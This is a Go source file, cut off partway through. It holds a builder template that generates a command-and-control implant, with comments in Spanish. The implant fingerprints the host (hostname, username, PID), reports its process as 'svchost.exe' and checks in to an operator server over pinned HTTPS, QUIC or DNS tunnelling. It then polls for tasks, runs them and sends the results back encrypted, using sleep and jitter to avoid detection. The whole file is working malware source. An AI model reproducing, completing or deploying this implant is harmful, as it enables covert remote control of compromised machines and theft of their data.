package builder

import (
	"bytes"
	"text/template"
)

// implantTemplate es el esqueleto del archivo main.go que se genera para
// cada build. Despacha en runtime según el esquema de ListenerURL:
//
//   - http://  o https://  → transporte HTTP(S) con perfil maleable HTTP
//   - dns://               → transporte DNS con perfil maleable DNS
//
// Inyecta la configuración como constantes de paquete para que el
// compilador las hornee en el binario.
//
// DEBUG: define RTC2_DEBUG=1 en el entorno del implante para que emita
// logs de diagnóstico a stderr. Sin esa variable, el implante es silencioso.
//
// TLS: la CA del server (CACertPEMBase64) se incrusta en el binario.
// El implante confía exclusivamente en esa CA, no en el trust store del
// sistema operativo. Esto evita MITM por CAs instaladas en el host.
//
// IMPORTANTE: este es el ÚNICO lugar donde vive el código del implante.
// No existe un cmd/implant/main.go paralelo; el implante se genera
// dinámicamente en cada build. Cualquier cambio de comportamiento debe
// hacerse aquí.
const implantTemplate = `// Code generated by rtc2 builder. DO NOT EDIT.
// BuildID: {{ .BuildID }}
// BuiltAt: {{ .BuiltAt }}
//go:build {{ .GoBuildTag }}

package main

import (
	"bytes"
	"context" 
	"crypto/ecdh"
	"crypto/rand"
	"crypto/sha256" 
	"crypto/tls"
	"crypto/x509"
	"encoding/base64"
	"encoding/hex" 
	"encoding/json"
	"errors"
	"fmt"
	"io"
	"math/big"
	"net"
	"net/http"
	"net/url"
	"os"
	"os/exec"
	"path/filepath"
	"runtime"
	"strconv"
	"strings"
	"time"

	"github.com/coder/websocket"
	"github.com/miekg/dns"
	"github.com/quic-go/quic-go"
	"github.com/uLl0a/lavianc2/internal/crypto"
	"github.com/uLl0a/lavianc2/internal/profiles"
	"github.com/uLl0a/lavianc2/internal/protocol"
)

// ---- Configuración inyectada en build time ----
const (
	BuildID         = "{{ .BuildID }}"
	ListenerURL     = "{{ .ListenerURL }}"
	WSUrl           = "{{ .WSURL }}"
	ProfileName     = "{{ .ProfileName }}"
	ServerPubKey    = "{{ .ServerPubKey }}"
	CACertPEMBase64 = "{{ .CACertPEMBase64 }}"
	SleepSecs       = {{ .SleepSecs }}
	JitterPerc      = {{ .JitterPerc }}
	Format          = "{{ .Format }}"
)

var (
	sleepSecs  = SleepSecs
	jitterPerc = JitterPerc

	senderSc          *crypto.SessionCrypto
	senderImplantID   string
	senderTransport   string // "http" | "dns" | "quic"
	senderProfileHTTP *profiles.Profile
	senderProfileDNS  *profiles.DNSProfile
	senderProfileQUIC *profiles.QUICProfile
	currentTaskID     string

	// debugEnabled controla si se emiten logs de diagnóstico a stderr.
	// Se activa con la variable de entorno RTC2_DEBUG=1 (o cualquier
	// valor no vacío). En operaciones reales debe quedar desactivado.
	debugEnabled = os.Getenv("RTC2_DEBUG") != ""
)

func debugLog(format string, args ...any) {
	if !debugEnabled {
		return
	}
	ts := time.Now().UTC().Format("2006-01-02T15:04:05.000Z")
	fmt.Fprintf(os.Stderr, "[rtc2 %s] %s\n", ts, fmt.Sprintf(format, args...))
}

func fatalExit(reason string, err error) {
	if err != nil {
		debugLog("FATAL: %s: %v", reason, err)
	} else {
		debugLog("FATAL: %s", reason)
	}
	os.Exit(1)
}

// truncate devuelve los primeros n caracteres de s, con "..." si se truncó.
func truncate(s string, n int) string {
	if len(s) <= n {
		return s
	}
	return s[:n] + "..."
}

func main() {
	debugLog("arrancando implante build=%s listener=%s profile=%s",
		BuildID, ListenerURL, ProfileName)

	u, err := url.Parse(ListenerURL)
	if err != nil || u.Scheme == "" {
		fatalExit("ListenerURL inválida", err)
	}

	switch u.Scheme {
	case "dns":
		runDNS()
	case "http", "https":
		runHTTP()
	case "quic":
		runQUIC()
	default:
		fatalExit("esquema no soportado: "+u.Scheme, nil)
	}
}

// ════════════════════════════════════════════════════════════════════
// TLS pinneado: el implante confía SOLO en la CA incrustada en el
// binario, no en el trust store del sistema operativo.
// ════════════════════════════════════════════════════════════════════

func newHTTPClient() (*http.Client, error) {
	caPEM, err := base64.StdEncoding.DecodeString(CACertPEMBase64)
	if err != nil {
		return nil, fmt.Errorf("decodificar CA: %w", err)
	}

	pool := x509.NewCertPool()
	if !pool.AppendCertsFromPEM(caPEM) {
		return nil, fmt.Errorf("CA PEM inválida (AppendCertsFromPEM falló)")
	}

	tlsCfg := &tls.Config{
		RootCAs:    pool,
		MinVersion: tls.VersionTLS13,
		// No hace falta ServerName explícito: Go lo deriva del URL.
		// El SAN del server debe incluir el host del ListenerURL.
	}

	transport := &http.Transport{
		TLSClientConfig:     tlsCfg,
		MaxIdleConns:        10,
		MaxIdleConnsPerHost: 4,
		IdleConnTimeout:     90 * time.Second,
		TLSHandshakeTimeout: 15 * time.Second,
	}

	return &http.Client{
		Timeout:   30 * time.Second,
		Transport: transport,
	}, nil
}

// ════════════════════════════════════════════════════════════════════
// Transporte HTTP / HTTPS
// ════════════════════════════════════════════════════════════════════

func runHTTP() {
	debugLog("modo HTTP, cargando perfil %q", ProfileName)
	registry := profiles.NewRegistry()
	profile, err := registry.Get(ProfileName)
	if err != nil {
		fatalExit("perfil no encontrado", err)
	}

	var (
		sc        *crypto.SessionCrypto
		implantID string
	)

	iteration := 0
	for {
		iteration++
		debugLog("iteración #%d (sc=%v implantID=%q)", iteration, sc != nil, implantID)

		if sc == nil {
			debugLog("sin sesión, haciendo handshake")
			s, id, err := performHandshakeHTTP(profile)
			if err != nil {
				debugLog("handshake falló: %v — reintentando en 30s", err)
				time.Sleep(30 * time.Second)
				continue
			}
			sc = s
			implantID = id
			implantIDGlobal = id

			// Estado del emisor chunked.
			senderTransport = "http"
			senderSc = sc
			senderImplantID = implantID
			senderProfileHTTP = profile

			debugLog("handshake OK implant_id=%s", implantID)
		}

		if err := beaconHTTP(profile, implantID, sc); err != nil {
			debugLog("beacon falló: %v — reseteando sesión", err)
			sc = nil
			implantID = ""
			senderSc = nil
			senderImplantID = ""
		}

		sleepWithJitter()
	}
}

func performHandshakeHTTP(profile *profiles.Profile) (*crypto.SessionCrypto, string, error) {
	debugLog("handshake: generando par ECDH")
	priv, pub, err := crypto.GenerateKeyPair()
	if err != nil {
		return nil, "", fmt.Errorf("generar par ECDH: %w", err)
	}
	debugLog("handshake: pub implante=%s", truncate(base64.StdEncoding.EncodeToString(pub.Bytes()), 16))

	hostname, _ := os.Hostname()
	sessionKey := randomSessionKey()
	debugLog("handshake: session_key=%s hostname=%s", sessionKey, hostname)

	req := map[string]any{
		"session_key": sessionKey,
		"hostname":    hostname,
		"username":    os.Getenv("USERNAME"),
		"os":          runtime.GOOS,
		"arch":        runtime.GOARCH,
		"pid":         os.Getpid(),
		"process":     "svchost.exe",
		"sleep":       sleepSecs,
		"jitter":      jitterPerc,
		"public_key":  base64.StdEncoding.EncodeToString(pub.Bytes()),
	}
	payload, _ := json.Marshal(req)
	env := protocol.NewEnvelope(protocol.MsgCheckin, payload)
	envBytes, _ := env.Marshal()

	httpReq, err := http.NewRequest("POST", ListenerURL, bytes.NewReader(envBytes))
	if err != nil {
		return nil, "", fmt.Errorf("crear request: %w", err)
	}
	profile.ApplyHeaders(httpReq)
	httpReq.Header.Set("Content-Type", "application/octet-stream")

	debugLog("handshake: POST %s (%d bytes)", ListenerURL, len(envBytes))
	client, err := newHTTPClient()
	if err != nil {
		return nil, "", fmt.Errorf("crear http client: %w", err)
	}
	resp, err := client.Do(httpReq)
	if err != nil {
		return nil, "", fmt.Errorf("POST falló: %w", err)
	}
	defer resp.Body.Close()
	debugLog("handshake: respuesta HTTP %d", resp.StatusCode)

	body, _ := io.ReadAll(resp.Body)
	debugLog("handshake: body recibido (%d bytes)", len(body))

	respEnv, err := protocol.UnmarshalEnvelope(body)
	if err != nil {
		return nil, "", fmt.Errorf("unmarshal envelope: %w", err)
	}
	debugLog("handshake: envelope tipo=%d len=%d", respEnv.Type, len(respEnv.Payload))

	var checkinResp struct {
		ServerPub string ` + "`json:\"server_pub\"`" + `
		SessionID string ` + "`json:\"implant_id\"`" + `
		Sleep     int    ` + "`json:\"sleep\"`" + `
		Jitter    int    ` + "`json:\"jitter\"`" + `
	}
	if err := json.Unmarshal(respEnv.Payload, &checkinResp); err != nil {
		return nil, "", fmt.Errorf("unmarshal checkin response: %w", err)
	}
	debugLog("handshake: server_pub=%s implant_id=%s sleep=%d jitter=%d",
		truncate(checkinResp.ServerPub, 16), checkinResp.SessionID,
		checkinResp.Sleep, checkinResp.Jitter)

	serverPub, err := decodeServerPub(checkinResp.ServerPub)
	if err != nil {
		return nil, "", fmt.Errorf("decode server_pub: %w", err)
	}

	debugLog("handshake: verificando pinning contra ServerPubKey")
	if err := verifyServerPubKey(serverPub); err != nil {
		return nil, "", fmt.Errorf("pinning falló: %w", err)
	}
	debugLog("handshake: pinning OK")

	sc, err := crypto.NewSessionCryptoAsBeacon(priv, serverPub, sessionKey, crypto.DefaultRekeyEvery)
	if err != nil {
		return nil, "", fmt.Errorf("derivar claves: %w", err)
	}
	debugLog("handshake: claves derivadas OK")

	if checkinResp.Sleep > 0 {
		sleepSecs = checkinResp.Sleep
	}
	if checkinResp.Jitter > 0 {
		jitterPerc = checkinResp.Jitter
	}

	return sc, checkinResp.SessionID, nil
}

func beaconHTTP(profile *profiles.Profile, implantID string, sc *crypto.SessionCrypto) error {
	debugLog("beacon: preparando poll")
	empty, _ := json.Marshal(map[string]any{})
	encEmpty, err := sc.EncryptForC2(empty, nil)
	if err != nil {
		return fmt.Errorf("cifrar poll: %w", err)
	}
	wrapper := protocol.EncryptedWrapper{ImplantID: implantID, Data: encEmpty}
	pollPayload, _ := json.Marshal(wrapper)
	env := protocol.NewEnvelope(protocol.MsgTaskPull, pollPayload)
	envBytes, _ := env.Marshal()

	httpReq, err := http.NewRequest("POST", ListenerURL, bytes.NewReader(envBytes))
	if err != nil {
		return err
	}
	profile.ApplyHeaders(httpReq)
	httpReq.Header.Set("Content-Type", "application/octet-stream")

	client, err := newHTTPClient()
	if err != nil {
		return fmt.Errorf("crear http client: %w", err)
	}
	resp, err := client.Do(httpReq)
	if err != nil {
		return fmt.Errorf("POST poll: %w", err)
	}
	defer resp.Body.Close()
	debugLog("beacon: poll HTTP %d", resp.StatusCode)

	body, _ := io.ReadAll(resp.Body)
	respEnv, err := protocol.UnmarshalEnvelope(body)
	if err != nil {
		return fmt.Errorf("unmarshal respuesta: %w", err)
	}
	debugLog("beacon: respuesta tipo=%d len=%d", respEnv.Type, len(respEnv.Payload))

	if respEnv.Type == protocol.MsgKeyRotation {
		debugLog("beacon: server pide rekey")
		return handleRekeyRequestHTTP(profile, implantID, sc, respEnv.Payload)
	}
	if respEnv.Type != protocol.MsgTaskDispatch {
		return fmt.Errorf("tipo de respuesta inesperado: %d", respEnv.Type)
	}

	decrypted, err := sc.DecryptFromC2(respEnv.Payload, nil)
	if err != nil {
		return fmt.Errorf("descifrar respuesta: %w", err)
	}

	var tasks []protocol.TaskWire
	if err := json.Unmarshal(decrypted, &tasks); err != nil {
		return fmt.Errorf("unmarshal tareas: %w", err)
	}
	debugLog("beacon: %d tareas recibidas", len(tasks))

	for i, t := range tasks {
		debugLog("beacon: tarea %d/%d id=%s cmd=%s args=%v", i+1, len(tasks), t.ID, t.Command, t.Args)
		currentTaskID = t.ID 
		output, errMsg := executeTask(t.Command, t.Args, t.Payload)
		debugLog("beacon: tarea %s ejecutada, output=%d bytes err=%q", t.ID, len(output), errMsg)

		result := protocol.TaskResultWire{TaskID: t.ID, Output: output, Error: errMsg}
		resultJSON, _ := json.Marshal(result)
		encResult, err := sc.EncryptForC2(resultJSON, nil)
		if err != nil {
			debugLog("beacon: cifrar resultado falló: %v", err)
			continue
		}
		wrap := protocol.EncryptedWrapper{ImplantID: implantID, Data: encResult}
		wrapJSON, _ := json.Marshal(wrap)
		resEnv := protocol.NewEnvelope(protocol.MsgTaskResult, wrapJSON)
		resBytes, _ := resEnv.Marshal()

		req2, err := http.NewRequest("POST", ListenerURL, bytes.NewReader(resBytes))
		if err != nil {
			debugLog("beacon: crear request resultado falló: %v", err)
			continue
		}
		profile.ApplyHeaders(req2)
		req2.Header.Set("Content-Type", "application/octet-stream")
		resp2, err := client.Do(req2)
		if err != nil {
			debugLog("beacon: enviar resultado falló: %v", err)
			continue
		}
		resp2.Body.Close()
		debugLog("beacon: resultado %s enviado, HTTP %d", t.ID, resp2.StatusCode)
	}

	return nil
}

// ════════════════════════════════════════════════════════════════════
// Transporte QUIC
// ════════════════════════════════════════════════════════════════════

func newQUICTLSConfig() (*tls.Config, error) {
	caPEM, err := base64.StdEncoding.DecodeString(CACertPEMBase64)
	if err != nil {
		return nil, fmt.Errorf("decodificar CA: %w", err)
	}
	pool := x509.NewCertPool()
	if !pool.AppendCertsFromPEM(caPEM) {
		return nil, fmt.Errorf("CA PEM inválida")
	}
	return &tls.Config{
		RootCAs:    pool,
		MinVersion: tls.VersionTLS13,
		// ServerName lo rellena el caller con el host del ListenerURL.
	}, nil
}

// quicHostFromURL extrae "host:port" del ListenerURL (esquema quic://).
func quicHostFromURL() (string, error) {
	u, err := url.Parse(ListenerURL)
	if err != nil {
		return "", err
	}
	if u.Host == "" {
		return "", fmt.Errorf("quic: listener url sin host")
	}
	return u.Host, nil
}

func runQUIC() {
	debugLog("modo QUIC, cargando perfil %q", ProfileName)
	registry := profiles.NewQUICRegistry()
	profile, err := registry.Get(ProfileName)
	if err != nil {
		fatalExit("perfil QUIC no encontrado", err)
	}

	var (
		sc        *crypto.SessionCrypto
		implantID string
	)

	iteration := 0
	for {
		iteration++
		debugLog("iteración #%d (sc=%v implantID=%q)", iteration, sc != nil, implantID)

		if sc == nil {
			debugLog("sin sesión, haciendo handshake QUIC")
			s, id, err := performHandshakeQUIC(profile)
			if err != nil {
				debugLog("handshake QUIC falló: %v — reintentando en 30s", err)
				time.Sleep(30 * time.Second)
				continue
			}
			sc = s
			implantID = id

			// Estado del emisor chunked.
			senderTransport = "quic"
			senderSc = sc
			senderImplantID = implantID
			senderProfileQUIC = profile

			debugLog("handshake QUIC OK implant_id=%s", implantID)
		}

		if err := beaconQUIC(profile, implantID, sc); err != nil {
			debugLog("beacon QUIC falló: %v — reseteando sesión", err)
			sc = nil
			implantID = ""
			senderSc = nil
			senderImplantID = ""
		}

		sleepWithJitter()
	}
}

func performHandshakeQUIC(profile *profiles.QUICProfile) (*crypto.SessionCrypto, string, error) {
	priv, pub, err := crypto.GenerateKeyPair()
	if err != nil {
		return nil, "", err
	}

	hostname, _ := os.Hostname()
	sessionKey := randomSessionKey()
	debugLog("quic handshake: session_key=%s hostname=%s", sessionKey, hostname)

	req := map[string]any{
		"session_key": sessionKey,
		"hostname":    hostname,
		"username":    os.Getenv("USERNAME"),
		"os":          runtime.GOOS,
		"arch":        runtime.GOARCH,
		"pid":         os.Getpid(),
		"process":     "svchost.exe",
		"sleep":       sleepSecs,
		"jitter":      jitterPerc,
		"public_key":  base64.StdEncoding.EncodeToString(pub.Bytes()),
	}
	payload, _ := json.Marshal(req)
	env := protocol.NewEnvelope(protocol.MsgCheckin, payload)

	respEnv, err := exchangeQUIC(profile, env)
	if err != nil {
		return nil, "", err
	}

	var checkinResp struct {
		ServerPub string ` + "`json:\"server_pub\"`" + `
		SessionID string ` + "`json:\"implant_id\"`" + `
		Sleep     int    ` + "`json:\"sleep\"`" + `
		Jitter    int    ` + "`json:\"jitter\"`" + `
	}
	if err := json.Unmarshal(respEnv.Payload, &checkinResp); err != nil {
		return nil, "", err
	}
	debugLog("quic handshake: server_pub=%s implant_id=%s sleep=%d jitter=%d",
		truncate(checkinResp.ServerPub, 16), checkinResp.SessionID,
		checkinResp.Sleep, checkinResp.Jitter)

	serverPub, err := decodeServerPub(checkinResp.ServerPub)
	if err != nil {
		return nil, "", err
	}
	if err := verifyServerPubKey(serverPub); err != nil {
		return nil, "", fmt.Errorf("pinning falló: %w", err)
	}
	debugLog("quic handshake: pinning OK")

	sc, err := crypto.NewSessionCryptoAsBeacon(priv, serverPub, sessionKey, crypto.DefaultRekeyEvery)
	if err != nil {
		return nil, "", err
	}
	debugLog("quic handshake: claves derivadas OK")

	if checkinResp.Sleep > 0 {
		sleepSecs = checkinResp.Sleep
	}
	if checkinResp.Jitter > 0 {
		jitterPerc = checkinResp.Jitter
	}

	return sc, checkinResp.SessionID, nil
}

func beaconQUIC(profile *profiles.QUICProfile, implantID string, sc *crypto.SessionCrypto) error {
	empty, _ := json.Marshal(map[string]any{})
	encEmpty, err := sc.EncryptForC2(empty, nil)
	if err != nil {
		return err
	}
	wrapper := protocol.EncryptedWrapper{ImplantID: implantID, Data: encEmpty}
	pollPayload, _ := json.Marshal(wrapper)
	env := protocol.NewEnvelope(protocol.MsgTaskPull, pollPayload)

	respEnv, err := exchangeQUIC(profile, env)
	if err != nil {
		return err
	}
	debugLog("quic beacon: respuesta tipo=%d len=%d", respEnv.Type, len(respEnv.Payload))

	if respEnv.Type == protocol.MsgKeyRotation {
		debugLog("quic beacon: server pide rekey")
		return handleRekeyRequestQUIC(profile, implantID, sc, respEnv.Payload)
	}
	if respEnv.Type != protocol.MsgTaskDispatch {
		return fmt.Errorf("respuesta inesperada: %d", respEnv.Type)
	}

	decrypted, err := sc.DecryptFromC2(respEnv.Payload, nil)
	if err != nil {
		return err
	}

	var tasks []protocol.TaskWire
	if err := json.Unmarshal(decrypted, &tasks); err != nil {
		return err
	}
	debugLog("quic beacon: %d tareas recibidas", len(tasks))

	for i, t := range tasks {
		debugLog("quic beacon: tarea %d/%d id=%s cmd=%s", i+1, len(tasks), t.ID, t.Command)
		currentTaskID = t.ID 
		output, errMsg := executeTask(t.Command, t.Args, t.Payload)
		debugLog("quic beacon: tarea %s ejecutada, output=%d bytes err=%q", t.ID, len(output), errMsg)

		result := protocol.TaskResultWire{TaskID: t.ID, Output: output, Error: errMsg}
		resultJSON, _ := json.Marshal(result)
		encResult, err := sc.EncryptForC2(resultJSON, nil)
		if err != nil {
			continue
		}
		wrap := protocol.EncryptedWrapper{ImplantID: implantID, Data: encResult}
		wrapJSON, _ := json.Marshal(wrap)
		resEnv := protocol.NewEnvelope(protocol.MsgTaskResult, wrapJSON)
		_, _ = exchangeQUIC(profile, resEnv)
		debugLog("quic beacon: resultado %s enviado", t.ID)
	}

	return nil
}

// exchangeQUIC abre una conexión QUIC nueva, envía el envelope en un
// stream, cierra el write side, lee la respuesta hasta EOF, y cierra.
func exchangeQUIC(profile *profiles.QUICProfile, env *protocol.Envelope) (*protocol.Envelope, error) {
	host, err := quicHostFromURL()
	if err != nil {
		return nil, err
	}

	tlsCfg, err := newQUICTLSConfig()
	if err != nil {
		return nil, err
	}
	tlsCfg.NextProtos = profile.ALPN
	// ServerName = host sin puerto.
	if h, _, err := net.SplitHostPort(host); err == nil {
		tlsCfg.ServerName = h
	} else {
		tlsCfg.ServerName = host
	}

	ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
	defer cancel()

	quicCfg := &quic.Config{
		MaxIdleTimeout:  profile.MaxIdleTimeout,
		KeepAlivePeriod: profile.KeepAlivePeriod,
	}

	conn, err := quic.DialAddr(ctx, host, tlsCfg, quicCfg)
	if err != nil {
		return nil, fmt.Errorf("quic dial: %w", err)
	}
	defer conn.CloseWithError(0, "")

	stream, err := conn.OpenStreamSync(ctx)
	if err != nil {
		return nil, fmt.Errorf("quic open stream: %w", err)
	}

	envBytes, _ := env.Marshal()
	if _, err := stream.Write(envBytes); err != nil {
		return nil, fmt.Errorf("quic write: %w", err)
	}
	_ = stream.Close() // cierra write side, read sigue abierto

	_ = stream.SetReadDeadline(time.Now().Add(30 * time.Second))
	respBytes, err := io.ReadAll(stream)
	if err != nil {
		return nil, fmt.Errorf("quic read: %w", err)
	}

	respEnv, err := protocol.UnmarshalEnvelope(respBytes)
	if err != nil {
		return nil, fmt.Errorf("quic unmarshal: %w", err)
	}
	return respEnv, nil
}

func handleRekeyRequestQUIC(
	profile *profiles.QUICProfile,
	implantID string,
	sc *crypto.SessionCrypto,
	encrypted []byte,
) error {
	serverEphPub, err := decodeServerEphPub(sc, encrypted)
	if err != nil {
		return err
	}

	ephPriv, ephPub, err := crypto.GenerateKeyPair()
	if err != nil {
		return err
	}

	resp := map[string]string{
		"implant_eph_pub": base64.StdEncoding.EncodeToString(ephPub.Bytes()),
	}
	respJSON, _ := json.Marshal(resp)
	encResp, err := sc.EncryptForC2(respJSON, nil)
	if err != nil {
		return err
	}
	wrapper := protocol.EncryptedWrapper{ImplantID: implantID, Data: encResp}
	wrapJSON, _ := json.Marshal(wrapper)
	resEnv := protocol.NewEnvelope(protocol.MsgKeyRotation, wrapJSON)

	respEnv, err := exchangeQUIC(profile, resEnv)
	if err != nil {
		return err
	}

	if err := sc.ApplyRekeyAsBeacon(ephPriv, serverEphPub); err != nil {
		return err
	}
	if respEnv.Type != protocol.MsgKeyRotation {
		return fmt.Errorf("quic rekey: tipo inesperado: %d", respEnv.Type)
	}
	ack, err := sc.DecryptFromC2(respEnv.Payload, nil)
	if err != nil {
		return fmt.Errorf("quic rekey: descifrar ack: %w", err)
	}
	if string(ack) != "ok" {
		return fmt.Errorf("quic rekey: ack inesperado: %q", ack)
	}
	debugLog("rekey QUIC: ack OK, rekey completo")
	return nil
}

func runDNS() {
	debugLog("modo DNS, cargando perfil %q", ProfileName)
	registry := profiles.NewDNSRegistry()
	profile, err := registry.Get(ProfileName)
	if err != nil {
		fatalExit("perfil DNS no encontrado", err)
	}

	var (
		sc        *crypto.SessionCrypto
		implantID string
	)

	iteration := 0
	for {
		iteration++
		debugLog("iteración #%d (sc=%v implantID=%q)", iteration, sc != nil, implantID)

		if sc == nil {
			debugLog("sin sesión, haciendo handshake DNS")
			s, id, err := performHandshakeDNS(profile)
			if err != nil {
				debugLog("handshake DNS falló: %v — reintentando en 30s", err)
				time.Sleep(30 * time.Second)
				continue
			}
			sc = s
			implantID = id

			// Estado del emisor chunked.
			senderTransport = "dns"
			senderSc = sc
			senderImplantID = implantID
			senderProfileDNS = profile

			debugLog("handshake DNS OK implant_id=%s", implantID)
		}

		if err := beaconDNS(profile, implantID, sc); err != nil {
			debugLog("beacon DNS falló: %v — reseteando sesión", err)
			sc = nil
			implantID = ""
			senderSc = nil
			senderImplantID = ""
		}

		sleepWithJitter()
	}
}

func performHandshakeDNS(profile *profiles.DNSProfile) (*crypto.SessionCrypto, string, error) {
	debugLog("dns handshake: generando par ECDH")
	priv, pub, err := crypto.GenerateKeyPair()
	if err != nil {
		return nil, "", err
	}

	hostname, _ := os.Hostname()
	sessionKey := randomSessionKey()
	debugLog("dns handshake: session_key=%s hostname=%s", sessionKey, hostname)

	req := map[string]any{
		"session_key": sessionKey,
		"hostname":    hostname,
		"username":    os.Getenv("USERNAME"),
		"os":          runtime.GOOS,
		"arch":        runtime.GOARCH,
		"pid":         os.Getpid(),
		"process":     "svchost.exe",
		"sleep":       sleepSecs,
		"jitter":      jitterPerc,
		"public_key":  base64.StdEncoding.EncodeToString(pub.Bytes()),
	}
	payload, _ := json.Marshal(req)
	env := protocol.NewEnvelope(protocol.MsgCheckin, payload)

	// En el check-in aún no tenemos implant_id. Usamos el session_key corto
	// como identificador en el QNAME; el server lo usa como clave de
	// acumulación de chunks y para el lookup del implante.
	respEnv, err := exchangeDNS(profile, env, sessionKey)
	if err != nil {
		return nil, "", err
	}

	var checkinResp struct {
		ServerPub string ` + "`json:\"server_pub\"`" + `
		SessionID string ` + "`json:\"implant_id\"`" + `
		Sleep     int    ` + "`json:\"sleep\"`" + `
		Jitter    int    ` + "`json:\"jitter\"`" + `
	}
	if err := json.Unmarshal(respEnv.Payload, &checkinResp); err != nil {
		return nil, "", err
	}
	debugLog("dns handshake: server_pub=%s implant_id=%s sleep=%d jitter=%d",
		truncate(checkinResp.ServerPub, 16), checkinResp.SessionID,
		checkinResp.Sleep, checkinResp.Jitter)

	serverPub, err := decodeServerPub(checkinResp.ServerPub)
	if err != nil {
		return nil, "", err
	}
	debugLog("dns handshake: verificando pinning")
	if err := verifyServerPubKey(serverPub); err != nil {
		return nil, "", fmt.Errorf("pinning falló: %w", err)
	}
	debugLog("dns handshake: pinning OK")

	sc, err := crypto.NewSessionCryptoAsBeacon(priv, serverPub, sessionKey, crypto.DefaultRekeyEvery)
	if err != nil {
		return nil, "", err
	}
	debugLog("dns handshake: claves derivadas OK")

	if checkinResp.Sleep > 0 {
		sleepSecs = checkinResp.Sleep
	}
	if checkinResp.Jitter > 0 {
		jitterPerc = checkinResp.Jitter
	}

	return sc, checkinResp.SessionID, nil
}

func beaconDNS(profile *profiles.DNSProfile, implantID string, sc *crypto.SessionCrypto) error {
	debugLog("dns beacon: preparando poll")
	empty, _ := json.Marshal(map[string]any{})
	encEmpty, err := sc.EncryptForC2(empty, nil)
	if err != nil {
		return err
	}
	wrapper := protocol.EncryptedWrapper{ImplantID: implantID, Data: encEmpty}
	pollPayload, _ := json.Marshal(wrapper)
	env := protocol.NewEnvelope(protocol.MsgTaskPull, pollPayload)

	respEnv, err := exchangeDNS(profile, env, implantID)
	if err != nil {
		return err
	}
	debugLog("dns beacon: respuesta tipo=%d len=%d", respEnv.Type, len(respEnv.Payload))

	if respEnv.Type == protocol.MsgKeyRotation {
		debugLog("dns beacon: server pide rekey")
		return handleRekeyRequestDNS(profile, implantID, sc, respEnv.Payload)
	}
	if respEnv.Type != protocol.MsgTaskDispatch {
		return fmt.Errorf("respuesta inesperada: %d", respEnv.Type)
	}

	decrypted, err := sc.DecryptFromC2(respEnv.Payload, nil)
	if err != nil {
		return err
	}

	var tasks []protocol.TaskWire
	if err := json.Unmarshal(decrypted, &tasks); err != nil {
		return err
	}
	debugLog("dns beacon: %d tareas recibidas", len(tasks))

	for i, t := range tasks {
		debugLog("dns beacon: tarea %d/%d id=%s cmd=%s", i+1, len(tasks), t.ID, t.Command)
		currentTaskID = t.ID 
		output, errMsg := executeTask(t.Command, t.Args, t.Payload)
		debugLog("dns beacon: tarea %s ejecutada, output=%d bytes err=%q", t.ID, len(output), errMsg)

		if err := sendTaskResultDNS(profile, implantID, sc, t.ID, output, errMsg); err != nil {
			debugLog("dns beacon: enviar resultado %s falló: %v", t.ID, err)
			continue
		}
		debugLog("dns beacon: resultado %s enviado", t.ID)
	}

	return nil
}

// sendTaskResultDNS envía el resultado de una tarea por DNS.
//
// Si el output completo no cabe en el límite del transporte, hace un
// segundo intento con el output truncado a un tamaño seguro y anota el
// truncamiento en el campo Error para que el operador sepa que la
// información está incompleta.
//
// El límite del transporte viene dado por el perfil DNS:
//
//	MaxChunks × MaxLabelSize × 5/8 ≈ bytes descifrados
//
// Para dns-txt con MaxChunks=128 y MaxLabelSize=63: ~5 KB. Descontando
// el overhead del envelope, JSON y TaskID, dejamos un margen de 2.5 KB
// para el output.
func sendTaskResultDNS(
	profile *profiles.DNSProfile,
	implantID string,
	sc *crypto.SessionCrypto,
	taskID string,
	output []byte,
	errMsg string,
) error {
	// Intento 1: output completo.
	if err := trySendResultDNS(profile, implantID, sc, taskID, output, errMsg); err == nil {
		return nil
	} else {
		debugLog("dns beacon: envío completo falló: %v (output=%d bytes)", err, len(output))
	}

	// Intento 2: truncado. Dejamos un margen cómodo por debajo del límite
	// real del perfil para absorber el overhead del envelope + JSON.
	const safeOutputBytes = 2500

	truncated := output
	if len(truncated) > safeOutputBytes {
		truncated = truncated[:safeOutputBytes]
	}
	truncNote := fmt.Sprintf(
		"[salida truncada por límite DNS: %d de %d bytes] %s",
		len(truncated), len(output), errMsg,
	)
	if err := trySendResultDNS(profile, implantID, sc, taskID, truncated, truncNote); err != nil {
		return fmt.Errorf("envío truncado también falló: %w", err)
	}
	debugLog("dns beacon: resultado %s enviado truncado (%d de %d bytes)",
		taskID, len(truncated), len(output))
	return nil
}

// trySendResultDNS hace un único intento de envío sin truncar.
// Devuelve el error de exchangeDNS tal cual.
func trySendResultDNS(
	profile *profiles.DNSProfile,
	implantID string,
	sc *crypto.SessionCrypto,
	taskID string,
	output []byte,
	errMsg string,
) error {
	result := protocol.TaskResultWire{
		TaskID: taskID,
		Output: output,
		Error:  errMsg,
	}
	resultJSON, err := json.Marshal(result)
	if err != nil {
		return fmt.Errorf("marshal result: %w", err)
	}
	encResult, err := sc.EncryptForC2(resultJSON, nil)
	if err != nil {
		return fmt.Errorf("cifrar result: %w", err)
	}
	wrap := protocol.EncryptedWrapper{
		ImplantID: implantID,
		Data:      encResult,
	}
	wrapJSON, _ := json.Marshal(wrap)
	resEnv := protocol.NewEnvelope(protocol.MsgTaskResult, wrapJSON)
	_, err = exchangeDNS(profile, resEnv, implantID)
	return err
}

// exchangeDNS envía un envelope troceado en queries DNS y devuelve el
// envelope de respuesta que el server entrega en la última query.
//
// El envelope se codifica una sola vez con el perfil (base32 por defecto) y
// el string resultante se trocea en labels de tamaño ≤ MaxLabelSize. Cada
// trozo viaja en el slot X del QNAME; el server los reensambla en orden y
// procesa el envelope cuando llega el último.
func exchangeDNS(profile *profiles.DNSProfile, env *protocol.Envelope, sessionID string) (*protocol.Envelope, error) {
	envBytes, err := env.Marshal()
	if err != nil {
		return nil, err
	}
	encoded := profile.EncodeData(envBytes)

	chunks := splitChunks(encoded, profile.MaxLabelSize)
	if len(chunks) > profile.MaxChunks {
		return nil, fmt.Errorf("dns: envelope demasiado grande: %d chunks (max %d)",
			len(chunks), profile.MaxChunks)
	}
	total := len(chunks)
	debugLog("dns exchange: envelope tipo=%d encoded=%d bytes → %d chunks", env.Type, len(encoded), total)

	var lastAnswer string
	for seq, chunk := range chunks {
		qname := buildDNSQNAME(profile, chunk, seq, total, sessionID)
		debugLog("dns exchange: query %d/%d qname=%s", seq+1, total, qname)

		answer, err := queryDNSTXT(qname)
		if err != nil {
			return nil, err
		}
		debugLog("dns exchange: respuesta chunk %d: %q", seq, truncate(answer, 40))
		if answer == "err" {
